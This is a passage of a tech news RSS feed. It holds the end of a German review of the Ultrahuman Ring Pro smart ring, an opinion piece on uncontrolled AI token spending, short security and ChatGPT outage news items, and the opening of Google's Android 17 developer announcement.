<p class="wp-block-paragraph">Ultrahuman hebt sich von der Konkurrenz dadurch ab, dass es komplexe Daten in einem leicht verständlichen Format darstellt, beispielsweise bei der Bewertung des Gehirnalters oder der Erfassung des Schlafdefizits, das sich aus kumulierten schlechten Nächten ergibt. Es überwacht zudem, wie gut Ihr Gehirn während des Schlafs Abfallstoffe abbaut. Sie können auch die „PowerPlugs“ von Ultrahuman erkunden, bei denen es sich größtenteils um kostenlose Add-ons handelt, die eine individuellere Nachverfolgung ermöglichen.</p>



<p class="wp-block-paragraph">Ich nutze derzeit das neue Parent-Modul, das besonders auf die kumulative Erholung achtet, berücksichtigt, dass der Schlaf wahrscheinlich unruhiger ist, und Ihnen Tipps gibt, wie Sie wieder in die richtige Bahn kommen können.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.49.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200756" width="1024" height="577" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Wie bereits erwähnt, sind die meisten dieser PowerPlugs kostenlos. Es gibt jedoch auch solche, die Einblicke in spezielle Krankheiten wie Migräne bieten oder Daten mit einem Tesla synchronisieren; hierfür ist ein monatliches Abonnement erforderlich. Dabei handelt es sich um kostenpflichtige Funktionen, auf die die meisten Nutzer gut verzichten können.</p>



<h2 class="wp-block-heading">Akkulaufzeit &amp; Aufladen</h2>



<ul class="wp-block-list">
<li>Bis zu 15 Tage Akkulaufzeit</li>



<li>Bietet drei Akkubetriebsmodi</li>



<li>Ladeetui sorgt für weitere 45 Tage</li>
</ul>



<p class="wp-block-paragraph">Die Akkulaufzeit ist ein wichtiges Thema beim Pro-Modell – und das nicht nur, weil er länger durchhält als der Air. Neben der Verlängerung der Akkulaufzeit von 4–6 Tagen auf 15 Tage stehen Ihnen drei Akkubetriebsmodi zur Verfügung, mit denen Sie das Beste aus jeder Ladung herausholen können.</p>



<p class="wp-block-paragraph">Wenn Sie den Turbo-Modus wählen, bei dem alle Sensoren aktiviert sind, können Sie mit einer Laufzeit von bis zu 12 Tagen rechnen. Diese verlängert sich auf über 15 Tage, wenn Sie sich für den Chill-Akkumodus entscheiden. Dabei liegt der Schwerpunkt auf der Schlafaufzeichnung, doch wichtige Momente Ihres Tages werden weiterhin erfasst, um sicherzustellen, dass die wesentlichen Erkenntnisse weiterhin von Nutzen sind.</p>



<p class="wp-block-paragraph">Ich habe mit dem Pro problemlos eine Akkulaufzeit von fast zwei Wochen erreicht, was eine beeindruckende Leistung ist. Das ist besser als beim Oura Ring 5 und liegt in Bezug auf die Akkuleistung auf Augenhöhe mit dem <a href="https://www.pcwelt.de/article/3063223/ringconn-gen-2-test.html" target="_blank">RingConn Gen 2</a>.</p>



<p class="wp-block-paragraph">Zudem verfügen Sie nun über das Ladecase, das Ihnen eine zusätzliche Akkulaufzeit von 45 Tagen bietet. Sie müssen den Ring jedoch präzise im Ladegerät platzieren; ein akustisches Signal aus dem integrierten Lautsprecher bestätigt, dass der Ring wieder aufgeladen wird. Als der Akku auf 0 Prozent sank, benötigte der Pro weniger als eine Stunde, um wieder auf 100 Prozent zu kommen.</p>



<h2 class="wp-block-heading">Preis &amp; Verfügbarkeit</h2>



<p class="wp-block-paragraph">Zum Zeitpunkt der Erstellung dieses Artikels kann der Ultrahuman Ring Pro für 499 Euro im <a href="https://www.pcwelt.de/article/3181848/ultrahuman-ring-pro-test-review.html#" target="_blank">Ultrahuman Store</a> vorbestellt werden. Damit gehört er zu den teuersten Smart-Ringen auf dem Markt.</p>



<p class="wp-block-paragraph">Er ist teurer als das günstigste verfügbare Modell des Oura Ring 5 und andere Smart-Ringe wie der <a href="https://whttps//www.pcwelt.de/article/3062918/samsung-galaxy-ring-test.html" target="_blank" rel="noreferrer noopener">Samsung Galaxy Ring</a>. Der in Kürze erscheinende RingConn Gen 3 wird in den USA teurer sein als der Ring Pro, sollte in anderen Regionen jedoch günstiger sein.</p>



<p class="wp-block-paragraph">Wie der Ring Air bleibt auch der Pro ein Smart-Ring ohne Abonnement. Einige der PowerPlug-Software-Erweiterungen sind jedoch mit zusätzlichen Kosten verbunden.</p>



<h2 class="wp-block-heading">Sollten Sie den Ultrahuman Ring Pro kaufen?</h2>



<p class="wp-block-paragraph">Die großen Verbesserungen des Ring Pro gegenüber dem Air liegen in dem größeren Akku und dem robusteren Design. Ich habe die Überwachungsleistung des Air nie als unzureichend empfunden, und wenn Sie noch ein Exemplar ergattern können und ein Fan des Software-Ansatzes von Ultrahuman sind, dann ist er nach wie vor eine kluge (und günstigere) Anschaffung.</p>



<p class="wp-block-paragraph">Vergleicht man den Ring Pro mit anderen Smart-Ringen, müssen wir über den Preis sprechen. Er ist teuer, und es gibt abonnementsfreie Alternativen zu einem günstigeren Preis. Ob diese Ihnen auf der Softwareseite das gleiche Maß an Sorgfalt und Aufmerksamkeit bieten, ist fraglich. Genau hier setzt sich der Ring Pro gegenüber einem Großteil der Konkurrenz durch.</p>



<p class="wp-block-paragraph">Er ist vielleicht nicht der kleinste oder dünnste Ring, aber was der Ring Pro zu bieten hat, ist eine Kombination aus Hardware und Software, die ein hervorragendes Gesamtpaket ergibt.</p>



<h2 class="wp-block-heading">Technische Daten</h2>



<ul class="wp-block-list">
<li>Bis zu 15 Tage Akkulaufzeit</li>



<li>Kompatibel mit Android und iOS</li>



<li>Wasserdicht bis zu 100 Metern</li>



<li>2,65 mm dick</li>



<li>Gewicht: 3,3–4,8 g</li>



<li>Erfasst den Blutsauerstoffgehalt, die Herzfrequenz und die Körpertemperatur</li>



<li>Erfasst den Schlaf und die tägliche Aktivität</li>
</ul>



<p class="wp-block-paragraph">(<a href="https://www.pcwelt.de/article/3181848/ultrahuman-ring-pro-test-review.html" data-type="link" data-id="https://www.pcwelt.de/article/3181848/ultrahuman-ring-pro-test-review.html" target="_blank">PC-Welt</a>)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Getting a grip on shadow tokens and AI blowouts]]></title>
<description><![CDATA[Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and a clear case study in how limited oversight snowbal...]]></description>
<link>https://tsecurity.de/de/3694389/it-security-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694389/it-security-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and <a href="https://www.forbes.com/sites/janakirammsv/2026/05/17/uber-burns-its-2026-ai-budget-in-four-months-on-claude-code/">a clear case study</a> in how limited oversight snowballs into an AI blowout.</p>



<p class="wp-block-paragraph">This is a phenomenon I like to call “shadow tokens” — AI credits paid for by the company but largely invisible to decision-makers. Too many engineers have the final say over how much they consume and, therefore, what it costs. This all-you-can-eat attitude is part of the reason why <a href="https://www.theverge.com/tech/930447/microsoft-claude-code-discontinued-notepad">Microsoft is reportedly</a> winding down many internal licenses across key engineering teams and why <a href="https://www.thestreet.com/investing/the-next-phase-of-ai-spending-is-already-underway">one in five organizations</a> is missing its AI spend forecast by more than 50%.</p>



<p class="wp-block-paragraph">And the trend is only accelerating. By 2028, <a href="https://www.cio.com/article/4189149/ai-coding-token-costs-are-on-track-to-rival-human-payroll.html">Gartner predicts</a> that AI coding costs (driven by this kind of ungoverned consumption) will be as much per developer as the salary companies pay that person.</p>



<p class="wp-block-paragraph">LLMs and agents introduce a new class of variable cost that scales with behavior rather than headcount, putting enterprises on the hook for tools that balloon with workload. I don’t see this as enterprises overspending because they’re reckless — it’s down to a lack of managerial oversight, budget alignment that demands a proven return on investment, and engineer education on how much is too much.</p>



<p class="wp-block-paragraph">Going forward, CIOs need to thread the AI needle between governance that encourages transparency and reasonable spend without stifling innovation.</p>



<h2 class="wp-block-heading">When shadow tokens result in real costs</h2>



<p class="wp-block-paragraph">The issue is that AI isn’t a traditional line item. Previously, enterprise leaders onboarded software-as-a-service (SaaS) with a good idea of the total cost. An allocated software seat or annual contract was a known quantity. The cloud added some variation (with fluctuations depending on hosting size), but instances were still modelable. AI flips this status quo on its head — the unit of consumption is behavior and the cost is exponential.</p>



<p class="wp-block-paragraph">And these specifics aren’t immediately apparent at pilot. Tools can appear inexpensive in controlled experiments yet unpredictably scale depending on session length, context window size, model selection and whether agents run in parallel. This is the fallacy of the $20-per-seat enterprise plan — tokens are charged separately at API rates with no ceiling. The final dollar value of any session is set by factors that finance can’t always model in advance, particularly when these decisions usually rest with the engineers themselves.</p>



<p class="wp-block-paragraph">According to <a href="https://www.deloitte.com/cz-sk/en/services/consulting/research/the-state-of-ai-in-the-enterprise.html">Deloitte</a>, only 21% of organizations deploying agents have a mature governance model, a real concern because they’re token-eating machines. This is what was happening at Uber — Claude Code in agentic mode was autonomously reading codebases, planning changes across dozens of files and opening pull requests. Each step quickly adds up, with Anthropic’s own documentation noting that agents consume approximately seven times as many tokens as standard sessions.</p>



<p class="wp-block-paragraph">This is shadow IT and shadow AI, evolved. This time, however, many leaders approved the tool in question without guardrails governing consumption. AI hype adds fuel to the fire and normalizes long sessions. Uber’s CTO, for example, <a href="https://x.com/praveenTweets/status/2033627282418655711">described</a> a company-wide shift toward “agentic software engineering” with employees “who are quietly experimenting, quietly shipping and quietly pushing things forward”. This is an exciting way to test the limits of what’s possible, certainly, but it’s also a position that goes a long way to explaining how the company spent its annual AI budget by April.</p>



<h2 class="wp-block-heading">Shifting the culture from usage to yield</h2>



<p class="wp-block-paragraph">Engineers haven’t done anything wrong here. In fact, they’re adopting and experimenting as instructed, with Uber creating leaderboards and ranking users by token consumption. More use led to a better ranking, reflecting a culture that lauds new ways of doing things. This behavior is known as “<a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html">tokenmaxxing</a>,” and its principal knock-on effect is shadow tokens — quantity-over-quality processes that leaders struggle to control until they’re fully realized in the budget. Of course, if management treats adoption metrics as performance metrics, then engineers can’t be blamed for using more tokens. The tension is that the teams driving adoption aren’t the ones managing spend.</p>



<p class="wp-block-paragraph">None of this is meant to dismiss AI’s productivity possibilities and potential return on investment. Developers save <a href="https://getdx.com/blog/ai-assisted-engineering-q4-impact-report-2025/">3.6 hours</a> per week, achieve 60% higher pull request throughput and cut onboarding time in half with automation. Meanwhile, Uber shared that roughly 11% of live backend updates were written by agents with no human in the loop. However, these wins aren’t the problem — it’s that too many teams aren’t connecting input to output. I’ve spoken to admins who discovered their token spend had tripled in a single quarter after using heavier models or accidentally doubling up on agentic applications. Nobody knew until the financial damage was done.</p>



<p class="wp-block-paragraph">Automation needs to happen sustainably with an eye on the bottom line. In my view, a much better metric for achieving this is AI yield — the measurable business or engineering output generated per dollar spent on tokens. Otherwise, without a feedback loop, even genuinely productive teams are flying blind.</p>



<h2 class="wp-block-heading">Stopping token waste before an AI blowout</h2>



<p class="wp-block-paragraph">Creating that throughline between AI investment and token consumption starts with established financial metrics. This is possible via maximum spend limits (dictated by spend tagging, workload tiering and cost-per-output benchmarks) per team or project. Then, any additional allocation requires approval, closing the loop between the engineers spending the tokens and the leaders paying for them. AI isn’t cheap and teams should demonstrate a bang for their buck.</p>



<p class="wp-block-paragraph">This is something we do with our engineering team at Hexnode. Resource allocation for Claude Code and Cursor is tied directly to ROI rather than letting consumption run open-ended. Given the pay-as-you-go nature of these tools, a firm usage limit per team offers simple but essential control.</p>



<p class="wp-block-paragraph">Similarly, there’s room to apply some of the governance principles IT uses for device management. Things like policy enforcement, role-based access, real-time monitoring and automated alerts can flag usage behavior in advance. Uncovering such insights at the token layer works to identify power users and prevent excessive spending.</p>



<p class="wp-block-paragraph">We also need to encourage cultures that praise outputs that actually achieve efficiency. AI applications that result in shipping faster, reducing rework and cutting review cycles are gains that should be celebrated. If your company hosts leaderboards, frame unnecessary token burn as wasteful rather than valuable. The organizations creating healthier consumption habits work with their engineers to understand not just how to use AI, but what responsible use looks like and what it costs.</p>



<p class="wp-block-paragraph">This is a conversation teams need to have now. Anthropic <a href="https://support.claude.com/en/articles/15036540-use-the-claude-agent-sdk-with-your-claude-plan">just ended flat-rate pricing</a> for programmatic workloads from June 15. Now, agents, continuous integration pipelines and automated workflows draw from a dedicated monthly credit pool billed separately from the subscription. Once that pool is exhausted, agent tasks either stop entirely or overflow to extra billing. Work can either get very expensive or grind to a halt for teams that aren’t prepared.</p>



<p class="wp-block-paragraph">Getting a grip on shadow tokens means better rules and tools connecting spend to outcomes. Only by building the financial and cultural infrastructure that encourages sustainable adoption can leaders see what they’re spending, connect it to what they’re getting and course-correct before the costs become a crisis. Ultimately, shadow tokens are only invisible if we choose not to look.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[WhatsApp-Studie warnt vor Business-Konten]]></title>
<description><![CDATA[Business-Konten gelten als vertrauenswürdig. Doch laut einer neuen Studie stammen 60 Prozent riskanter WhatsApp-Chats von ihnen.]]></description>
<link>https://tsecurity.de/de/3694348/it-security-nachrichten/whatsapp-studie-warnt-vor-business-konten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694348/it-security-nachrichten/whatsapp-studie-warnt-vor-business-konten/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Business-Konten gelten als vertrauenswürdig. Doch laut einer neuen Studie stammen 60 Prozent riskanter WhatsApp-Chats von ihnen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Über Add-on von Adobe: Forscher zeigen Whatsapp-Datenklau mit nur einem Klick]]></title>
<description><![CDATA[Über 300 Millionen Nutzer vertrauen einer Chrome-Erweiterung von Adobe. Angreifer konnten darüber jedoch leicht Whatsapp-Chats ausleiten. (Sicherheitslücke, Browser)]]></description>
<link>https://tsecurity.de/de/3694203/it-security-nachrichten/ueber-add-on-von-adobe-forscher-zeigen-whatsapp-datenklau-mit-nur-einem-klick/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694203/it-security-nachrichten/ueber-add-on-von-adobe-forscher-zeigen-whatsapp-datenklau-mit-nur-einem-klick/</guid>
<pubDate>Sat, 25 Jul 2026 18:52:05 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Über 300 Millionen Nutzer vertrauen einer Chrome-Erweiterung von Adobe. Angreifer konnten darüber jedoch leicht Whatsapp-Chats ausleiten. (<a href="https://www.golem.de/specials/sicherheitsluecke/">Sicherheitslücke</a>, <a href="https://www.golem.de/specials/browser/">Browser</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=211189&amp;page=1&amp;ts=1784798642" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Too many concurrent requests when opening ChatGPT? You’re not alone]]></title>
<description><![CDATA[ChatGPT users are seeing a “Too many concurrent requests” error while trying to open the chatbot or submit a prompt. The problem is part of a wider service disruption affecting users worldwide.



ChatGPT is currently facing an outage



OpenAI’s official status page confirms elevated error rates...]]></description>
<link>https://tsecurity.de/de/3693856/ios-mac-os/too-many-concurrent-requests-when-opening-chatgpt-youre-not-alone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693856/ios-mac-os/too-many-concurrent-requests-when-opening-chatgpt-youre-not-alone/</guid>
<pubDate>Sat, 25 Jul 2026 13:19:46 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ChatGPT users are seeing a “Too many concurrent requests” error while trying to open the chatbot or submit a prompt. The problem is part of a wider service disruption affecting users worldwide.



ChatGPT is currently facing an outage



OpenAI’s official status page confirms elevated error rates across ChatGPT, its APIs, and Codex. The company says it is investigating the issue, although it has not yet shared the exact cause or a recovery timeline.







Users have also reported login failures, missing conversation history, delayed responses, and prompts that fail to send. Reports appear to be coming from several regions, including India and the United States.







The concurrent requests message does not necessarily mean you opened too many chats. During an outage, overloaded servers can display the same error across many accounts.



For now, avoid repeatedly refreshing the page. Check OpenAI’s status page and try ChatGPT again after the service stabilizes.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Confirms ChatGPT is Down Worldwide]]></title>
<description><![CDATA[ChatGPT is down for many users worldwide today. People trying to log in or send a message are running into errors, and reports are coming in from the United States, Europe, India, Japan, and Australia.



Complaints started building up on DownDetector and X within a short window this afternoon. M...]]></description>
<link>https://tsecurity.de/de/3693775/ios-mac-os/openai-confirms-chatgpt-is-down-worldwide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693775/ios-mac-os/openai-confirms-chatgpt-is-down-worldwide/</guid>
<pubDate>Sat, 25 Jul 2026 11:49:11 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ChatGPT is down for many users worldwide today. People trying to log in or send a message are running into errors, and reports are coming in from the United States, Europe, India, Japan, and Australia.



Complaints started building up on DownDetector and X within a short window this afternoon. Most of what people are describing points to the login or authentication layer rather than the chat model itself.



Users say they get stuck on a loading screen, get signed out in the middle of a conversation, or cannot open their older chats at all. Both free and paid ChatGPT accounts seem to be affected, and the trouble is not limited to the website. Some people on the mobile app have run into the same login problems.



Common symptoms being reported include:




Failed logins or repeated authentication errors



Chat history that will not load



Sessions ending without warning



"Service unavailable" messages when sending a prompt




OpenAI's Response So Far



OpenAI's status page lists the affected services as under investigation. At the same time, the page has flipped between showing an active issue and showing normal operation while engineers work through the fix. This kind of mismatch is common during login related outages, since the sign in system can break down even while the core chatbot keeps running fine underneath it.



This is not the first rough week for ChatGPT. Just two days earlier, on July 23, OpenAI dealt with a separate outage affecting ChatGPT, Codex, and its API that took close to 24 hours to fully resolve. With this new round of complaints landing so soon after that incident, users on social media have started asking why the service has been running into trouble so often lately.



If you cannot get into ChatGPT right now, a few small steps can help before you assume the worst:




Refresh the page, or fully close and reopen the app



Log out and log back in instead of just refreshing



Check status.openai.com for the latest update



Try the mobile app if the website will not load, or the other way around




OpenAI has not shared a root cause or a timeline for a fix yet, and this piece will be updated once more information comes in.]]></content:encoded>
</item>
<item>
<title><![CDATA[Android 17 is here]]></title>
<description><![CDATA[Posted by Matthew McCullough, VP of Product Management, Android DeveloperToday we're releasing Android 17 and making it available on most supported Pixel devices. Look for new devices running Android 17 in the coming months.

Android 17 marks the start of our transition to an intelligence system,...]]></description>
<link>https://tsecurity.de/de/3693505/android-tipps/android-17-is-here/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693505/android-tipps/android-17-is-here/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:36 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgV7zuuXjulHty999mGDWY1kfL8Q9SXjYYWn-7JTpMfVdNP78eb5fW9shOpvVdEqK0WnNp7AhdO0qc7pXAaqcfTwXgOGsfZyqcQv8wyD-9niWBpZuP6ZAPHBSetWenN2lMlRS5wi2d71-n8RCYqrLsFhUCEvM7KeoGLnNaDbiyOZQ0vvyr0O580nXK4Vas/s2048/Metadata%20-%20Static.png"><div><i>Posted by Matthew McCullough, VP of Product Management, Android Developer</i></div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5KPJZylMSUXRpKFRUd6oM4fNdEoDRdJzdkzg69P_BVUuIDtXqCqTid6hGH40CoHRw7-f50HsT6rISArklGH982MM4K1jKU16SSymes4JPoE4qOZ5s1lLnkbInpUpdJGu5erAYmSgiefzkkOX_ng3AUJKOzzwC1WMTjk2DxLNia8R1C-ErWc7jT4VP8ew/s4209/Blogger%20Hero%20-%20White.png"><img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5KPJZylMSUXRpKFRUd6oM4fNdEoDRdJzdkzg69P_BVUuIDtXqCqTid6hGH40CoHRw7-f50HsT6rISArklGH982MM4K1jKU16SSymes4JPoE4qOZ5s1lLnkbInpUpdJGu5erAYmSgiefzkkOX_ng3AUJKOzzwC1WMTjk2DxLNia8R1C-ErWc7jT4VP8ew/s16000/Blogger%20Hero%20-%20White.png"></a></div><br><p><br></p><p>Today we're releasing Android 17 and making it available on most supported Pixel devices. Look for new devices running Android 17 in the coming months.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjaHGBWXu3yvdXZ-wYQgN6DjN5TEMRIYDJvQDZTOybRZFWsAMhqhl14b9UZmrlXlEIRDioqRc8m3xRjOnQHJPoICkVpCho4qrmKihPbu_SB7dGVNKwlAaX6eWdjLF4VUdGyzGfxtW0ziFggj63e778VVo38qpMKar4E1wuw0MiPCBvBdrTTXCgI1XD04Q/s1080/AfD-Android-17.gif"><img border="0" data-original-height="1080" data-original-width="1080" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjaHGBWXu3yvdXZ-wYQgN6DjN5TEMRIYDJvQDZTOybRZFWsAMhqhl14b9UZmrlXlEIRDioqRc8m3xRjOnQHJPoICkVpCho4qrmKihPbu_SB7dGVNKwlAaX6eWdjLF4VUdGyzGfxtW0ziFggj63e778VVo38qpMKar4E1wuw0MiPCBvBdrTTXCgI1XD04Q/s320/AfD-Android-17.gif" width="320"></a></div>

<p>Android 17 marks the start of our transition to an intelligence system, putting your apps at the center. It's shifting to an adaptive-first development standard by introducing mandatory large-screen resizability, all while delivering next-generation privacy, security, media, camera, and performance. We'll cover all that in this post, as well as how we're bringing together next generation tools, libraries, and agent skills to help your apps embrace the opportunity.</p>

<p>Throughout the past year, from our Canary channel to our Beta releases, we’ve collaborated with you in the developer community to build a platform you and your users can trust. To that end, this moment marks the availability of the source code at the <a href="https://source.android.com/">Android Open Source Project</a> (AOSP). This allows you to <a href="https://cs.android.com/">examine the source code</a> for a deeper understanding of how Android works.</p>

<p>Let's dive deeper into Android 17.</p>

<h3>An intelligence system</h3>

<p>With deep integration between hardware, software and AI, we’re transforming Android from an operating system to an intelligence system. It's about delivering new helpful experiences that anticipate user needs, and it brings more opportunities for engagement with your apps. To that end, Android 17 expands the capabilities of AppFunctions, a platform API with a corresponding Jetpack library. It allows you to contribute your app's unique capabilities as orchestratable "tools" for Android MCP, the on-device equivalent of the <a href="https://modelcontextprotocol.io/">Model Context Protocol</a>. AI agents and assistants (like Google Gemini) can discover and execute AppFunctions to perform workflows on behalf of the user with direct access to the app's local state.</p>

<p>The Jetpack library, currently in alpha, makes adding AppFunctions as easy as annotating a class and adding KDoc comments.</p>

<pre><code>/**
 * A note app's [AppFunction]s.
 */
class NoteFunctions(
    private val noteRepository: NoteRepository
) {
    /**
     * Adds a new note to the app.
     *
     * @param appFunctionContext The execution context.
     * @param title The title of the note.
     * @param content The note's content.
     */
    @AppFunction(isDescribedByKDoc = true)
    suspend fun createNote(
        appFunctionContext: AppFunctionContext,
        title: String,
        content: String
    ): Note {
        return noteRepository.createNote(title, content)
    }
}</code></pre>

<p>We’ve also launched an <a href="http://github.com/android/skills/tree/main/on-device/appfunctions">AppFunctions agent skill</a> that analyzes your app’s key workflows, automatically generates the required Kotlin code, optimizes your KDocs for LLM tool-calling, and provides ADB commands for testing and debugging.</p>

<p>The Gemini integration is currently in a private preview with trusted testers, but you can begin preparing your apps now. In addition to ADB commands to execute your AppFunctions, we've provided a <a href="http://github.com/android/appfunctions/releases/initial">test agent app</a> that includes an interface to discover and execute your app functions and simulate an AI agent integration. Join our integration early access program at <a href="http://goo.gle/eap-af">goo.gle/eap-af</a> for a chance to be among the first apps to deploy AppFunctions to production.</p>

<h3>Adaptive-first</h3>
<p>Your users no longer rely on a single form factor; they transition between phones, foldables, tablets, laptops, automotive displays, and immersive XR environments. Now, with over <a href="https://developer.android.com/blog/posts/adaptive-development-for-the-expanding-android-ecosystem">580 million large screen devices</a> in the hands of users and the <a href="https://blog.google/products-and-platforms/platforms/android/meet-googlebook/">forthcoming launch of Googlebooks</a>, the next generation of ChromeOS built on the Android stack, adaptive is no longer just a technical goal. It’s a massive opportunity to reach highly engaged users, which is one of the reasons we're shifting to an <a href="https://developer.android.com/adaptive-apps">adaptive-first development standard</a>.</p>

<h2>No resizability/orientation restrictions on large screens</h2>
<p>To ensure apps deliver a premium experience across all form factors, including mobile devices running in desktop mode on connected displays, Android 17 (API level 37) removes the developer opt-out for orientation and resizability restrictions on <a href="https://developer.android.com/guide/topics/large-screens">large screen devices</a> (sw &gt; 600 dp) for apps targeting API level 37. The system will ignore legacy manifest attributes and runtime APIs, including screenOrientation, setRequestedOrientation(), resizeableActivity=false, and aspect ratio constraints (minAspectRatio/maxAspectRatio). Games (based on <a href="https://support.google.com/googleplay/android-developer/answer/9859673?hl=en">app category</a> in Google Play) remain exempt. Your app must be ready to adapt to any window size, respect the user's preferred device posture, and support free-form windowing natively.</p>

<h2>Next-gen multitasking: App Bubbles, Bubble Bar, and desktop interactive PiP</h2>
<p>Android 17 introduces powerful new windowing capabilities that redefine how users multitask, demanding even greater layout flexibility from your apps:</p>
<ul>
    <li><strong>App Bubbles:</strong> Moving beyond the messaging bubbles API, users can now transform any app into a floating bubble by long-pressing its icon on the launcher. This feature is available across phones, foldables, and tablets, enabling lightweight multitasking for any workflow.</li>
    <li><strong>The Bubble Bar:</strong> On large screens (tablets and foldables), the system taskbar now includes a dedicated Bubble Bar to organize, transition between, and dock these floating app bubbles.</li>
    <li><strong>Desktop interactive PiP:</strong> In desktop environments, Android 17 introduces interactive Picture-in-Picture (PiP). Unlike traditional PiP windows which are read-only, these pinned windows remain fully interactive while staying always-on-top of other application windows.</li>
</ul>

<div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg12FRQ31sUiyMj_ZalamTRI4VyI2tMXYKEoRy6b-u0Het272IDbRhznXot7b8AvFJEX-ubw_-pNxyS5JTKPUTBj1CNXwIYkTE906vembUcHeyGzE4Lb72WRyGNF7dOP_aBssNeCplOjEnKAc3d3hkak81LOpG0g9Hlep0AvC11MjdJ1MkqAp7ViUCu2bw/s1600/Bubbles%20(1).gif"><img border="0" data-original-height="1600" data-original-width="1544" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg12FRQ31sUiyMj_ZalamTRI4VyI2tMXYKEoRy6b-u0Het272IDbRhznXot7b8AvFJEX-ubw_-pNxyS5JTKPUTBj1CNXwIYkTE906vembUcHeyGzE4Lb72WRyGNF7dOP_aBssNeCplOjEnKAc3d3hkak81LOpG0g9Hlep0AvC11MjdJ1MkqAp7ViUCu2bw/s16000/Bubbles%20(1).gif"></a></div><p><i>App Bubbles and Bubble Bar in action</i></p>

<h2>Activity recreation updates</h2>
<p>To prevent disruptive state loss and stutter, Android 17 updates the default behavior for Activity recreation. The system will no longer restart activities by default for typical configuration changes that do not require a full UI redraw (including <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_keyboard">CONFIG_KEYBOARD</a>, <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_keyboard_hidden">CONFIG_KEYBOARD_HIDDEN</a>, <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_navigation">CONFIG_NAVIGATION</a>, <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_touchscreen">CONFIG_TOUCHSCREEN</a>, and <a href="https://developer.android.com/reference/kotlin/android/content/pm/ActivityInfo#config_color_mode">CONFIG_COLOR_MODE</a>).<br>
Instead, running activities will receive these updates via onConfigurationChanged(), enabling smooth transitions. If your application explicitly relies on a full restart to reload resources for these changes, you must now explicitly opt-in using the new <a href="https://developer.android.com/reference/kotlin/android/R.attr#recreateonconfigchanges">android:recreateOnConfigChanges</a> manifest attribute.</p>

<h2>Continue On</h2>
